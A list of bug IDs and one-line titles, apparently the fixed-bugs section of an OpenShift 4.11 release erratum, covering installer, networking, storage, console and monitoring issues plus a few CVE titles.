2047702 - Issue described on bug #2013528 reproduced: mapi_current_pending_csr is always set to 1 on OpenShift Container Platform 4.8
2047710 - [OVN] ovn-dbchecker CrashLoopBackOff and sbdb jsonrpc unix socket receive error
2047732 - [IBM]Volume is not deleted after destroy cluster
2047741 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the module.masters.aws_network_interface.master[1] resource
2047790 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2047799 - release-openshift-ocp-installer-e2e-aws-upi-4.9
2047870 - Prevent redundant queries of BIOS settings in HostFirmwareController
2047895 - Fix architecture naming in oc adm release mirror for aarch64
2047911 - e2e: Mock CSI tests fail on IBM ROKS clusters
2047913 - [sig-network][Feature:Router] The HAProxy router should override the route host for overridden domains with a custom value [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2047925 - [FJ OCP4.10 Bug]: IRONIC_KERNEL_PARAMS does not contain coreos_kernel_params during iPXE boot
2047935 - [4.11] Bootimage bump tracker
2047998 - [alicloud] CCM deploys alibaba-cloud-controller-manager from quay.io/openshift/origin-
2048059 - Service Level Agreement (SLA) always show 'Unknown'
2048067 - [IPI on Alibabacloud] "Platform Provisioning Check" tells '"ap-southeast-6": enhanced NAT gateway is not supported', which seems false
2048186 - Image registry operator panics when finalizes config deletion
2048214 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud
2048219 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool
2048221 - Capitalization of titles in the VM details page is inconsistent.
2048222 - [AWS GovCloud] Cluster can not be installed on AWS GovCloud regions via terminal interactive UI.
2048276 - Cypress E2E tests fail due to a typo in test-cypress.sh
2048333 - prometheus-adapter becomes inaccessible during rollout
2048352 - [OVN] node does not recover after NetworkManager restart, NotReady and unreachable
2048442 - [KMS] UI does not have option to specify kube auth path and namespace for cluster wide encryption
2048451 - Custom serviceEndpoints in install-config are reported to be unreachable when environment uses a proxy
2048538 - Network policies are not implemented or updated by OVN-Kubernetes
2048541 - incorrect rbac check for install operator quick starts
2048563 - Leader election conventions for cluster topology
2048575 - IP reconciler cron job failing on single node
2048686 - Check MAC address provided on the install-config.yaml file
2048687 - All bare metal jobs are failing now due to End of Life of centos 8
2048793 - Many Conformance tests are failing in OCP 4.10 with Kuryr
2048803 - CRI-O seccomp profile out of date
2048824 - [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class
2048841 - [ovn] Missing lr-policy-list and snat rules for egressip when new pods are added
2048955 - Alibaba Disk CSI Driver does not have CI
2049073 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured
2049078 - Bond CNI: Failed to attach Bond NAD to pod
2049108 - openshift-installer intermittent failure on AWS with 'Error: Error waiting for NAT Gateway (nat-xxxxx) to become available'
2049117 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently
2049133 - oc adm catalog mirror throws 'missing signature key' error when using file://local/index
2049142 - Missing "app" label
2049169 - oVirt CSI driver should use the trusted CA bundle when cluster proxy is configured
2049234 - ImagePull fails with error "unable to pull manifest from example.com/busy.box:v5 invalid reference format"
2049410 - external-dns-operator creates provider section, even when not requested
2049483 - Sidepanel for Connectors/workloads in topology shows invalid tabs
2049613 - MTU migration on SDN IPv4 causes API alerts
2049671 - system:serviceaccount:openshift-cluster-csi-drivers:aws-ebs-csi-driver-operator trying to GET and DELETE /api/v1/namespaces/openshift-cluster-csi-drivers/configmaps/kube-cloud-config which does not exist
2049687 - superfluous apirequestcount entries in audit log
2049775 - cloud-provider-config change not applied when ExternalCloudProvider enabled
2049787 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs
2049832 - ContainerCreateError when trying to launch large (>500) numbers of pods across nodes
2049872 - cluster storage operator AWS credentialsrequest lacks KMS privileges
2049889 - oc new-app --search nodejs warns about access to sample content on quay.io
2050005 - Plugin module IDs can clash with console module IDs causing runtime errors
2050011 - Observe > Metrics page: Timespan text input and dropdown do not align
2050120 - Missing metrics in kube-state-metrics
2050146 - Installation on PSI fails with: 'openstack platform does not have the required standard-attr-tag network extension'
2050173 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0
2050180 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2
2050300 - panic in cluster-storage-operator while updating status
2050332 - Malformed ClusterClaim lifetimes cause the clusterclaims-controller to silently fail to reconcile all clusterclaims
2050335 - azure-disk failed to mount with error special device does not exist
2050345 - alert data for burn budget needs to be updated to prevent regression
2050407 - revert "force cert rotation every couple days for development" in 4.11
2050409 - ip-reconcile job is failing consistently
2050452 - Update osType and hardware version used by RHCOS OVA to indicate it is a RHEL 8 guest
2050466 - machine config update with invalid container runtime config should be more robust
2050637 - Blog Link not re-directing to the intended website in the last modal in the Dev Console Onboarding Tour
2050698 - After upgrading the cluster the console still show 0 of N, 0% progress for worker nodes
2050707 - up test for prometheus pod looks too far in the past
2050767 - Vsphere upi tries to access vsphere during manifests generation phase
2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function
2050882 - Crio appears to be coredumping in some scenarios
2050902 - not all resources created during import have common labels
2050946 - Cluster-version operator fails to notice TechPreviewNoUpgrade featureSet change after initialization-lookup error
2051320 - Need to build ose-aws-efs-csi-driver-operator-bundle-container image for 4.11
2051333 - [aws] records in public hosted zone and BYO private hosted zone were not deleted.
2051377 - Unable to switch vfio-pci to netdevice in policy
2051378 - Template wizard is crashed when there are no templates existing
2051423 - migrate loadbalancers from amphora to ovn not working
2051457 - [RFE] PDB for cloud-controller-manager to avoid going too many replicas down
2051470 - prometheus: Add validations for relabel configs
2051558 - RoleBinding in project without subject is causing "Project access" page to fail
2051578 - Sort is broken for the Status and Version columns on the Cluster Settings > ClusterOperators page
2051583 - sriov must-gather image doesn't work
2051593 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line
2051611 - Remove Check which enforces summary_interval must match logSyncInterval
2051642 - Remove "Tech-Preview" Label for the Web Terminal GA release
2051657 - Remove 'Tech preview' from minimal deployment Storage System creation
2051718 - MetaLLB: Validation Webhook: BGPPeer hold time is allowed to be set to less than 3s
2051722 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop
2051881 - [vSphere CSI driver Operator] RWX volumes counts metrics vsphere_rwx_volumes_total not valid
2051954 - Allow changing of policyAuditConfig ratelimit post-deployment
2051969 - Need to build local-storage-operator-metadata-container image for 4.11
2051985 - An APIRequestCount without dots in the name can cause a panic
2052016 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set.
2052034 - Can't start correct debug pod using pod definition yaml in OCP 4.8
2052055 - Whereabouts should implement client-go 1.22+
2052056 - Static pod installer should throttle creating new revisions
2052071 - local storage operator metrics target down after upgrade
2052095 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1
2052270 - FSyncControllerDegraded has "treshold" -> "threshold" typos
2052309 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests
2052332 - Probe failures and pod restarts during 4.7 to 4.8 upgrade
2052393 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh
2052398 - 4.9 to 4.10 upgrade fails for ovnkube-masters
2052415 - Pod density test causing problems when using kube-burner
2052513 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade.
2052578 - Create new app from a private git repository using 'oc new-app' with basic auth does not work.
2052595 - Remove dev preview badge from IBM FlashSystem deployment windows
2052618 - Node reboot causes duplicate persistent volumes
2052671 - Add Sprint 214 translations
2052674 - Remove extra spaces
2052700 - kube-controller-manger should use configmap lease
2052701 - kube-scheduler should use configmap lease
2052814 - go fmt fails in OSM after migration to go 1.17
2052840 - IMAGE_BUILDER=docker make test-e2e-operator-ocp runs with podman instead of docker
2052953 - Observe dashboard always opens for last viewed workload instead of the selected one
2052956 - Installing virtualization operator duplicates the first action on workloads in topology
2052975 - High cpu load on Juniper Qfx5120 Network switches after upgrade to Openshift 4.8.26
2052986 - Console crashes when Mid cycle hook in Recreate strategy(edit deployment/deploymentConfig) selects Lifecycle strategy as "Tags the current image as an image stream tag if the deployment succeeds"
2053006 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11
2053104 - [vSphere CSI driver Operator] hw_version_total metric update wrong value after upgrade nodes hardware version from vmx-13 to vmx-15
2053112 - nncp status is unknown when nnce is Progressing
2053118 - nncp Available condition reason should be exposed in oc get
2053168 - Ensure the core dynamic plugin SDK package has correct types and code
2053205 - ci-openshift-cluster-network-operator-master-e2e-agnostic-upgrade is failing most of the time
2053304 - Debug terminal no longer works in admin console
2053312 - requestheader IDP test doesn't wait for cleanup, causing high failure rates
2053334 - rhel worker scaleup playbook failed because missing some dependency of podman
2053343 - Cluster Autoscaler not scaling down nodes which seem to qualify for scale-down
2053491 - nmstate interprets interface names as float64 and subsequently crashes on state update
2053501 - Git import detection does not happen for private repositories
2053582 - inability to detect static lifecycle failure
2053596 - [IBM Cloud] Storage IOPS limitations and lack of IPI ETCD deployment options trigger leader election during cluster initialization
2053609 - LoadBalancer SCTP service leaves stale conntrack entry that causes issues if service is recreated
2053622 - PDB warning alert when CR replica count is set to zero
2053685 - Topology performance: Immutable .toJSON consumes a lot of CPU time when rendering a large topology graph (~100 nodes)
2053721 - When using RootDeviceHint rotational setting the host can fail to provision
2053922 - [OCP 4.8][OVN] pod interface: error while waiting on OVS.Interface.external-ids
2054095 - [release-4.11] Gather images.config.openshift.io cluster resource definition
2054197 - The ProjectHelmChartRepository schema has merged but has not been initialized in the cluster yet
2054200 - Custom created services in openshift-ingress removed even though the services are not of type LoadBalancer
2054238 - console-master-e2e-gcp-console is broken
2054254 - vSphere test failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
2054285 - Services other than knative service also shows as KSVC in add subscription/trigger modal
2054319 - must-gather | gather_metallb_logs can't detect metallb pod
2054351 - Restart of ptp4l/phc2sys on change of PTPConfig generates socket error in event framework more than once
2054385 - redhat-operator index image build failed with AMQ brew build - amq-interconnect-operator-metadata-container-1.10.13
2054564 - DPU network operator 4.10 branch need to sync with master
2054630 - cancel create silence from kebab menu of alerts page will navigate to the previous page
2054693 - Error deploying HorizontalPodAutoscaler with oc new-app command in OpenShift 4
2054701 - [MAPO] Events are not created for MAPO machines
2054705 - [tracker] nf_reinject calls nf_queue_entry_free on an already freed entry->state
2054735 - Bad link in CNV console
2054770 - IPI baremetal deployment metal3 pod crashes when using capital letters in hosts bootMACAddress
2054787 - SRO controller goes to CrashLoopBackOff status when the pull-secret does not have the correct permissions
2054950 - A large number is showing on disk size field
2055305 - Thanos Querier high CPU and memory usage till OOM
2055386 - MetalLB changes the shared external IP of a service upon updating the externalTrafficPolicy definition
2055433 - Unable to create br-ex as gateway is not found
2055470 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation
2055492 - The default YAML on vm wizard is not latest
2055601 - installer did not destroy .app dns record in an IPI on ASH install
2055702 - Enable Serverless tests in CI
2055723 - CCM operator doesn't deploy resources after enabling TechPreviewNoUpgrade feature set.
2055729 - NodePerfCheck fires and stays active on momentary high latency
2055814 - Custom dynamic extension point causes runtime and compile time error
2055861 - cronjob collect-profiles failure leads node to reach OutOfPods status
2055980 - [dynamic SDK][internal] console plugin SDK does not support table actions
2056454 - Implement preallocated disks for oVirt in the cluster API provider
2056460 - Implement preallocated disks for oVirt in the OCP installer
2056496 - If image does not exist for builder image then upload jar form crashes
2056519 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies
2056607 - Running kubernetes-nmstate handler e2e tests stuck on OVN clusters
2056752 - Better to name the oc-mirror version info with more information, like oc version --client
2056802 - "enforcedLabelLimit|enforcedLabelNameLengthLimit|enforcedLabelValueLengthLimit" do not take effect
2056841 - [UI] [DR] Web console update is available pop-up is seen multiple times on Hub cluster where ODF operator is not installed and unnecessarily it pop-up on the Managed cluster as well where ODF operator is installed
2056893 - incorrect warning for --to-image in oc adm upgrade help
2056967 - MetalLB: speaker metrics is not updated when deleting a service
2057025 - Resource requests for the init-config-reloader container of prometheus-k8s- pods are too high
2057054 - SDK: k8s methods resolves into Response instead of the Resource
2057079 - [cluster-csi-snapshot-controller-operator] CI failure: events should not repeat pathologically
2057101 - oc commands working with images print an incorrect and inappropriate warning
2057160 - configure-ovs selects wrong interface on reboot
2057183 - OperatorHub: Missing "valid subscriptions" filter
2057251 - response code for Pod count graph changed from 422 to 200 periodically for about 30 minutes if pod is rescheduled
2057358 - [Secondary Scheduler] - cannot build bundle index image using the secondary scheduler operator bundle
2057387 - [Secondary Scheduler] - olm.skiprange, com.redhat.openshift.versions is incorrect and no minkubeversion
2057403 - CMO logs show forbidden: User "system:serviceaccount:openshift-monitoring:cluster-monitoring-operator" cannot get resource "replicasets" in API group "apps" in the namespace "openshift-monitoring"
2057495 - Alibaba Disk CSI driver does not provision small PVCs
2057558 - Marketplace operator polls too frequently for cluster operator status changes
2057633 - oc rsync reports misleading error when container is not found
2057642 - ClusterOperator status.conditions[].reason "etcd disk metrics exceeded..." should be a CamelCase slug
2057644 - FSyncControllerDegraded latches True, even after fsync latency recovers on all members
2057696 - Removing console still blocks OCP install from completing
2057762 - ingress operator should report Upgradeable False to remind user before upgrade to 4.10 when Non-SAN certs are used
2057832 - expr for record rule: "cluster:telemetry_selected_series:count" is improper
2057967 - KubeJobCompletion does not account for possible job states
2057990 - Add extra debug information to image signature workflow test
2057994 - SRIOV-CNI failed to load netconf: LoadConf(): failed to get VF information
2058030 - On OCP 4.10+ using OVNK8s on BM IPI, nodes register as localhost.localdomain
2058217 - [vsphere-problem-detector-operator] 'vsphere_rwx_volumes_total' metric name is confusing
2058225 - openshift_csi_share_ metrics are not found from telemeter server
2058282 - Websockets stop updating during cluster upgrades
2058291 - CI builds should have correct version of Kube without needing to push tags every time
2058368 - Openshift OVN-K got restarted multiple times with the error "ovsdb-server/memory-trim-on-compaction on'' failed: exit status 1" and "ovndbchecker.go:118] unable to turn on memory trimming for SB DB, stderr", cluster unavailable
2058370 - e2e-aws-driver-toolkit CI job is failing
2058421 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install
2058424 - ConsolePlugin proxy always passes Authorization header even if authorize property is omitted or false
2058623 - Bootstrap server dropdown menu in Create Event Source- KafkaSource form is empty even if it's created
2058626 - Multiple Azure upstream kube fsgroupchangepolicy tests are permafailing expecting gid "1000" but geting "root"
2058671 - whereabouts IPAM CNI ip-reconciler cronjob specification requires hostnetwork, api-int lb usage & proper backoff
2058692 - [Secondary Scheduler] Creating secondaryscheduler instance fails with error "key failed with : secondaryschedulers.operator.openshift.io "secondary-scheduler" not found"
2059187 - [Secondary Scheduler] - key failed with : serviceaccounts "secondary-scheduler" is forbidden
2059212 - [tracker] Backport https://github.com/util-linux/util-linux/commit/eab90ef8d4f66394285e0cff1dfc0a27242c05aa
2059213 - ART cannot build installer images due to missing terraform binaries for some architectures
2059338 - A fully upgraded 4.10 cluster defaults to HW-13 hardware version even if HW-15 is default (and supported)
2059490 - The operator image in CSV file of the ART DPU network operator bundle is incorrect
2059567 - vMedia based IPI installation of OpenShift fails on Nokia servers due to issues with virtual media attachment and boot source override
2059586 - (release-4.11) Insights operator doesn't reconcile clusteroperator status condition messages
2059654 - Dynamic demo plugin proxy example out of date
2059674 - Demo plugin fails to build
2059716 - cloud-controller-manager flaps operator version during 4.9 -> 4.10 update
2059791 - [vSphere CSI driver Operator] didn't update 'vsphere_csi_driver_error' metric value when fixed the error manually
2059840 - [LSO]Could not gather logs for pod diskmaker-discovery and diskmaker-manager
2059943 - MetalLB: Move CI config files to metallb repo from dev-scripts repo
2060037 - Configure logging level of FRR containers
2060083 - CMO doesn't react to changes in clusteroperator console
2060091 - CMO produces invalid alertmanager statefulset if console cluster .status.consoleURL is unset
2060133 - [OVN RHEL upgrade] could not find IP addresses: failed to lookup link br-ex: Link not found
2060147 - RHEL8 Workers Need to Ensure libseccomp is up to date at install time
2060159 - LGW: External->Service of type ETP=Cluster doesn't go to the node
2060329 - Detect unsupported amount of workloads before rendering a lazy or crashing topology
2060334 - Azure VNET lookup fails when the NIC subnet is in a different resource group
2060361 - Unable to enumerate NICs due to missing the 'primary' field due to security restrictions
2060406 - Test 'operators should not create watch channels very often' fails
2060492 - Update PtpConfigSlave source-crs to use network_transport L2 instead of UDPv4
2060509 - Incorrect installation of ibmcloud vpc csi driver in IBM Cloud ROKS 4.10
2060532 - LSO e2e tests are run against default image and namespace
2060534 - openshift-apiserver pod in crashloop due to unable to reach kubernetes svc ip
2060549 - ErrorAddingLogicalPort: duplicate IP found in ECMP Pod route cache!
2060553 - service domain can't be resolved when networkpolicy is used in OCP 4.10-rc
2060583 - Remove Console internal-kubevirt plugin SDK package
2060605 - Broken access to public images: Unable to connect to the server: no basic auth credentials
2060617 - IBMCloud destroy DNS regex not strict enough
2060687 - Azure Ci: SubscriptionDoesNotSupportZone - does not support availability zones at location 'westus'
2060697 - [AWS] partitionNumber cannot work for specifying Partition number
2060714 - [DOCS] Change source_labels to sourceLabels in "Configuring remote write storage" section
2060837 - [oc-mirror] Catalog merging error when two or more bundles do not have a set Replace field
2060894 - Preceding/Trailing Whitespaces In Form Elements on the add page
2060924 - Console white-screens while using debug terminal
2060968 - Installation failing due to ironic-agent.service not starting properly
2060970 - Bump recommended FCOS to 35.20220213.3.0
2061002 - Conntrack entry is not removed for LoadBalancer IP
2061301 - Traffic Splitting Dialog is Confusing With Only One Revision
2061303 - Cachito request failure with vendor directory is out of sync with go.mod/go.sum
2061304 - workload info gatherer - don't serialize empty images map
2061333 - White screen for Pipeline builder page
2061447 - [GSS] local pv's are in terminating state
2061496 - etcd RecentBackup=Unknown ControllerStarted contains no message string
2061527 - [IBMCloud] infrastructure asset missing CloudProviderType
2061544 - AzureStack is hard-coded to use Standard_LRS for the disk type
2061549 - AzureStack install with internal publishing does not create api DNS record
2061611 - [upstream] The marker of KubeBuilder doesn't work if it is close to the code
2061732 - Cinder CSI crashes when API is not available
2061755 - Missing breadcrumb on the resource creation page
2061833 - A single worker can be assigned to multiple baremetal hosts
2061891 - [IPI on IBMCLOUD] missing 'br-sao' region in openshift installer
2061916 - mixed ingress and egress policies can result in half-isolated pods
2061918 - Topology Sidepanel style is broken
2061919 - Egress Ip entry stays on node's primary NIC post deletion from hostsubnet
2062007 - MCC bootstrap command lacks template flag
2062126 - IPfailover pod is crashing during creation showing keepalived_script doesn't exist
2062151 - Add RBAC for 'infrastructures' to operator bundle
2062355 - kubernetes-nmstate resources and logs not included in must-gathers
2062459 - Ingress pods scheduled on the same node
2062524 - [Kamelet Sink] Topology crashes on click of Event sink node if the resource is created source to Uri over ref
2062558 - Egress IP with openshift sdn is not functional on worker node.
2062568 - CVO does not trigger new upgrade again after fail to update to unavailable payload
2062645 - configure-ovs: don't restart networking if not necessary
2062713 - Special Resource Operator(SRO) - No sro_used_nodes metric
2062849 - hw event proxy is not binding on ipv6 local address
2062920 - Project selector is too tall with only a few projects
2062998 - AWS GovCloud regions are recognized as the unknown regions
2063047 - Configuring a full-path query log file in CMO breaks Prometheus with the latest version of the operator
2063115 - ose-aws-efs-csi-driver has invalid dependency in go.mod
2063164 - metal-ipi-ovn-ipv6 Job Permafailing and Blocking OpenShift 4.11 Payloads: insights operator is not available
2063183 - DefragDialTimeout is set to low for large scale OpenShift Container Platform - Cluster
2063194 - cluster-autoscaler-default will fail when automated etcd defrag is running on large scale OpenShift Container Platform 4 - Cluster
2063321 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs
2063324 - MCO template output directories created with wrong mode causing render failure in unprivileged container environments
2063375 - ptp operator upgrade from 4.9 to 4.10 stuck at pending due to service account requirements not met
2063414 - on OKD 4.10, when image-registry is enabled, the /etc/hosts entry is missing on some nodes
2063699 - Builds - Builds - Logs: i18n misses.
2063708 - Builds - Builds - Logs: translation correction needed.
2063720 - Metallb EBGP neighbor stuck in active until adding ebgp-multihop (directly connected neighbors)
2063732 - Workloads - StatefulSets : I18n misses
2063747 - When building a bundle, the push command fails because it passes a redundant "IMG=" on the CLI
2063753 - User Preferences - Language - Language selection : Page refresh required to change the UI into selected Language.
2063756 - User Preferences - Applications - Insecure traffic : i18n misses
2063795 - Remove go-ovirt-client go.mod replace directive
2063829 - During an IPI install with the 4.10.4 installer on vSphere, getting "Check": platform.vsphere.network: Invalid value: "VLAN_3912": unable to find network provided"
2063831 - etcd quorum pods landing on same node
2063897 - Community tasks not shown in pipeline builder page
2063905 - PrometheusOperatorWatchErrors alert may fire shortly in case of transient errors from the API server
2063938 - Using the hard-coded rest-mapper in library-go
2063955 - cannot download operator catalogs due to missing images
2063957 - User Management - Users : While Impersonating user, UI is not switching into user's set language
2064024 - SNO OCP upgrade with DU workload stuck at waiting for kube-apiserver static pod
2064170 - [Azure] Missing punctuation in the installconfig.controlPlane.platform.azure.osDisk explain
2064239 - Virtualization Overview page turns into blank page
2064256 - The Knative traffic distribution doesn't update percentage in sidebar
2064553 - UI should prefer to use the virtio-win configmap than v2v-vmware configmap for windows creation
2064596 - Fix the hubUrl docs link in pipeline quicksearch modal
2064607 - Pipeline builder makes too many (100+) API calls upfront
2064613 - [OCPonRHV]- after few days that cluster is alive we got error in storage operator
2064693 - [IPI][OSP] Openshift-install fails to find the shiftstack cloud defined in clouds.yaml in the current directory
2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server
2064705 - the alertmanagerconfig validation catches the wrong value for invalid field
2064744 - Errors trying to use the Debug Container feature
2064984 - Update error message for label limits
2065076 - Access monitoring Routes based on monitoring-shared-config creates wrong URL
2065160 - Possible leak of load balancer targets on AWS Machine API Provider
2065224 - Configuration for cloudFront in image-registry operator configuration is ignored & duration is corrupted
2065290 - CVE-2021-23648 sanitize-url: XSS
2065338 - VolumeSnapshot creation date sorting is broken
2065507 - oc adm upgrade should return ReleaseAccepted condition to show upgrade status.
2065510 - [AWS] failed to create cluster on ap-southeast-3
2065513 - Dev Perspective -> Project Dashboard shows Resource Quotas which are a bit misleading, and too many decimal places
2065547 - (release-4.11) Gather kube-controller-manager pod logs with garbage collector errors
2065552 - [AWS] Failed to install cluster on AWS ap-southeast-3 region due to image-registry panic error
2065577 - user with user-workload-monitoring-config-edit role can not create user-workload-monitoring-config configmap
2065597 - Cinder CSI is not configurable
2065682 - Remote write relabel config adds label __tmp_openshift_cluster_id to all metrics
2065689 - Internal Image registry with GCS backend does not redirect client
2065749 - Kubelet slowly leaking memory and pods eventually unable to start
2065785 - ip-reconciler job does not complete, halts node drain
2065804 - Console backend check for Web Terminal Operator incorrectly returns HTTP 204
2065806 - stop considering Mint mode as supported on Azure
2065840 - the cronjob object is created with a wrong api version batch/v1beta1 when created via the openshift console
2065893 - [4.11] Bootimage bump tracker
2066009 - CVE-2021-44906 minimist: prototype pollution
2066232 - e2e-aws-workers-rhel8 is failing on ansible check
2066418 - [4.11] Update channels information link is taking to a 404 error page
2066444 - The "ingress" clusteroperator's relatedObjects field has kind names instead of resource names
2066457 - Prometheus CI failure: 503 Service Unavailable
2066463 - [IBMCloud] failed to list DNS zones: Exactly one of ApiKey or RefreshToken must be specified
2066605 - coredns template block matches cluster API too loosely
2066615 - Downstream OSDK still uses upstream image for Hybrid type operator
2066619 - The GitCommit of the oc-mirror version is not correct
2066665 - [ibm-vpc-block] Unable to change default storage class
2066700 - [node-tuning-operator] - Minimize wildcard/privilege Usage in Cluster and Local Roles
2066754 - Cypress reports for core tests are not captured
2066782 - Attached disk keeps in loading status when add disk to a power off VM by non-privileged user
2066865 - Flaky test: In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (delayed binding)] topology should provision a volume and schedule a pod with AllowedTopologies
2066886 - openshift-apiserver pods never going NotReady
2066887 - Dependabot alert: Path traversal in github.com/valyala/fasthttp
2066889 - Dependabot alert: Path traversal in github.com/valyala/fasthttp
2066923 - No rule to make target 'docker-push' when building the SRO bundle
2066945 - SRO appends "arm64" instead of "aarch64" to the kernel name and it doesn't match the DTK
2067004 - CMO contains grafana image though grafana is removed
2067005 - Prometheus rule contains grafana though grafana is removed
2067062 - should update prometheus-operator resources version
2067064 - RoleBinding in Developer Console is dropping all subjects when editing
2067155 - Incorrect operator display name shown in pipelines quickstart in devconsole
2067180 - Missing i18n translations
2067298 - Console 4.10 operand form refresh
2067312 - PPT event source is lost when received by the consumer
2067384 - OCP 4.10 should be firing APIRemovedInNextEUSReleaseInUse for APIs removed in 1.25
2067456 - OCP 4.11 should be firing APIRemovedInNextEUSReleaseInUse and APIRemovedInNextReleaseInUse for APIs removed in 1.25
2067995 - Internal registries with a big number of images delay pod creation due to recursive SELinux file context relabeling
2068115 - resource tab extension fails to show up
2068148 - [4.11] /etc/redhat-release symlink is broken
2068180 - OCP UPI on AWS with STS enabled is breaking the Ingress operator
2068181 - Event source powered with kamelet type source doesn't show associated deployment in resources tab
2068490 - OLM descriptors integration test failing
2068538 - Crashloop back-off popover visual spacing defects
2068601 - Potential etcd inconsistent revision and data occurs
2068613 - ClusterRoleUpdated/ClusterRoleBindingUpdated Spamming Event Logs
2068908 - Manual blog link change needed
2069068 - reconciling Prometheus Operator Deployment failed while upgrading from 4.7.46 to 4.8.35
2069075 - [Alibaba 4.11.0-0.nightly] cluster storage component in Progressing state
2069181 - Disabling community tasks is not working
2069198 - Flaky CI test in e2e/pipeline-ci
2069307 - oc mirror hangs when processing the Red Hat 4.10 catalog
2069312 - extend rest mappings with 'job' definition
2069457 - Ingress operator has superfluous finalizer deletion logic for LoadBalancer-type services
2069577 - ConsolePlugin example proxy authorize is wrong
2069612 - Special Resource Operator (SRO) - Crash when nodeSelector does not match any nodes
2069632 - Not able to download previous container logs from console
2069643 - ConfigMaps leftovers while uninstalling SpecialResource with configmap
2069654 - Creating VMs with YAML on Openshift Virtualization UI is missing labels flavor, os and workload
2069685 - UI crashes on load if a pinned resource model does not exist
2069705 - prometheus target "serviceMonitor/openshift-metallb-system/monitor-metallb-controller/0" has a failure with "server returned HTTP status 502 Bad Gateway"
2069740 - On-prem loadbalancer ports conflict with kube node port range
2069760 - In developer perspective divider does not show up in navigation
2069904 - Sync upstream 1.18.1 downstream
2069914 - Application Launcher groupings are not case-sensitive
2069997 - [4.11] should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces
2070000 - Add warning alerts for installing standalone k8s-nmstate
2070020 - InContext doesn't work for Event Sources
2070047 - Kuryr: Prometheus when installed on the cluster shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured
2070160 - Copy-to-clipboard and <pre> elements cause display issues for ACM dynamic plugins
2070172 - SRO uses the chart's name as Helm release, not the SpecialResource's
2070181 - [MAPO] serverGroupName ignored
2070457 - Image vulnerability Popover overflows from the visible area
2070674 - [GCP] Routes get timed out and nonresponsive after creating 2K service routes
2070703 - some ipv6 network policy tests consistently failing
2070720 - [UI] Filter reset doesn't work on Pods/Secrets/etc pages and complete list disappears
2070731 - details switch label is not clickable on add page
2070791 - [GCP] Image registry crashes on cluster with GCP workload identity enabled
2070792 - service "openshift-marketplace/marketplace-operator-metrics" is not annotated with capability
2070805 - ClusterVersion: could not download the update
2070854 - cv.status.capabilities.enabledCapabilities doesn't show the day-2 enabled caps when there are errors on resources update
2070887 - Cv condition ImplicitlyEnabledCapabilities doesn't complain about disabled capabilities which were previously enabled
2070888 - Cannot bind driver vfio-pci when applying sriovnodenetworkpolicy with type vfio-pci
2070929 - OVN-Kubernetes: EgressIP breaks access from a pod with EgressIP to other host networked pods on different nodes
2071019 - rebase vsphere csi driver 2.5
2071021 - vsphere driver has snapshot support missing
2071033 - conditionally relabel volumes given annotation not working - SELinux context match is wrong
2071139 - Ingress pods scheduled on the same node
2071364 - All image building tests are broken with "error: build error: attempting to convert BUILD_LOGLEVEL env var value "" to integer: strconv.Atoi: parsing "": invalid syntax"
2071578 - Monitoring navigation should not be shown if monitoring is not available (CRC)
2071599 - RoleBindings are not getting updated for ClusterRole in OpenShift Web Console
2071614 - Updating EgressNetworkPolicy rejecting with error UnsupportedMediaType
2071617 - remove Kubevirt extensions in favour of dynamic plugin
2071650 - ovn-k ovn_db_cluster metrics are not exposed for SNO
2071691 - OCP Console global PatternFly overrides add padding to breadcrumbs
2071700 - v1 events show "Generated from" message without the source/reporting component
2071715 - Shows 404 on Environment nav in Developer console
2071719 - OCP Console global PatternFly overrides link button whitespace
2071747 - Link to documentation from the overview page goes to a missing link
2071761 - Translation Keys Are Not Namespaced
2071799 - Multus CNI should exit cleanly on CNI DEL when the API server is unavailable
2071859 - ovn-kube pods spec.dnsPolicy should be Default
2071914 - cloud-network-config-controller 4.10.5: Error building cloud provider client, err: %vfailed to initialize Azure environment: autorest/azure: There is no cloud environment matching the name ""
2071998 - Cluster-version operator should share details of signature verification when it fails in 'Force: true' updates
2072106 - cluster-ingress-operator tests do not build on go 1.18
2072134 - Routes are not accessible within cluster from hostnet pods
2072139 - vsphere driver has permissions to create/update PV objects
2072154 - Secondary Scheduler operator panics
2072171 - Test "[sig-network][Feature:EgressFirewall] EgressFirewall should have no impact outside its namespace [Suite:openshift/conformance/parallel]" fails
2072195 - machine api doesn't issue client cert when AWS DNS suffix missing
2072215 - Whereabouts ip-reconciler should be opt-in and not required
2072389 - CVO exits upgrade immediately rather than waiting for etcd backup
2072439 - openshift-cloud-network-config-controller reports wrong range of IP addresses for Azure worker nodes
2072455 - make bundle overwrites supported-nic-ids_v1_configmap.yaml
2072570 - The namespace titles for operator-install-single-namespace test keep changing
2072710 - Perfscale - pods time out waiting for OVS port binding (ovn-installed)
